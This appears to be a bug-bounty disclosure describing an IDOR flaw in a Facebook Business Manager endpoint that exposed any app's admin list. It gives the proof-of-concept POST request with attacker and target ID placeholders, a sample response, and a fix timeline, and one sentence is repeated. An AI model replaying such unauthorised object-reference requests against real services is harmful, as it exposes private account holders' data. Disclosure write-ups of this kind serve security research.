Disclose Full Admin List of any Facebook Applications
In Facebook Business Manager, there is an endpoint that fetches the admin list particularly for pages, apps and more other assets. Meantime, call for Facebook Pages was secured but was vulnerable for the asset type apps.
IDOR(Insecure Direct Object Reference)
vulnerability allowed to fetch the admin list for any Facebook Application regardless of having the app assigned in the business manager account which was unrestricted.
IDOR (Insecure Direct Object Reference) vulnerability allowed to fetch the admin list for any Facebook Application regardless of having the app assigned in the business manager account which was unrestricted.
Proof of concept
Request:
POST /business/aymc_assets/admins/ HTTP/1.1
Host: business.facebook.com
asset_ids[0]=TARGET_APP_ID
business_id=ATTACKER_BUSINESS_ID
Response:
{"__ar": 1, "payload": {
"assetAdmins": {
"__imm": {
"method": "Map",
"value": [
["123456789",
{"name": "fname lname",
"id": "123456789",
"iconURI": "/images/assets_DO_NOT_HARDCODE/facebook_icons/badge-admin_outline_20_fds-black.png",
"isSelected": true,
"isSelectionDisabled": false,
"secondaryInfo": "FACEBOOK APP NAME"
}],
["123456789xxN",
{"name": "Admin N",
"id": "123456789xxN",
"iconURI": "/images/assets_DO_NOT_HARDCODE/facebook_icons/badge-admin_outline_20_fds-black.png",
"isSelected": true,
"isSelectionDisabled": false,
"secondaryInfo": "FACEBOOK APP NAME"
}]]}}}}
Impact
This could have let a malicious user to disclose any app admin/developer list.
Timeline
- 25 Dec, 2018 – Report Sent.
- 04 Jan, 2019 – Escalation by Facebook.
- 08 Jan, 2019 – Fixed by Facebook.
- 27 Mar, 2019 – Bounty Awarded by Facebook.